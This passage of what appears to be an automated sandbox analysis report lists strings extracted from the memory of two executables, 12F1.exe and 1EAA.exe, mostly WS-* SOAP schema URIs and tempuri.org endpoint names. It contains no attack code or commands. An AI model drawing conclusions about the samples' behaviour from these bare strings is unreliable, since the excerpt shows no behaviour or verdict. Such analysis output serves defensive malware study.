Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: 12F1.exe, 00000009.00000002.975014024.00000000032C2000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961234629.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: 12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978818128.00000000036FD000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	String found in binary or memory: http://service.r
Source: 12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978818128.00000000036FD000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: 12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	String found in binary or memory: http://support.a
Source: 12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092
Source: 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978366259.00000000035BF000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975014024.00000000032C2000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978687020.00000000036EC000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978458353.0000000003621000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseH
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseP
Source: 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978687020.00000000036EC000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseH
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseP
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978636240.00000000036E8000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
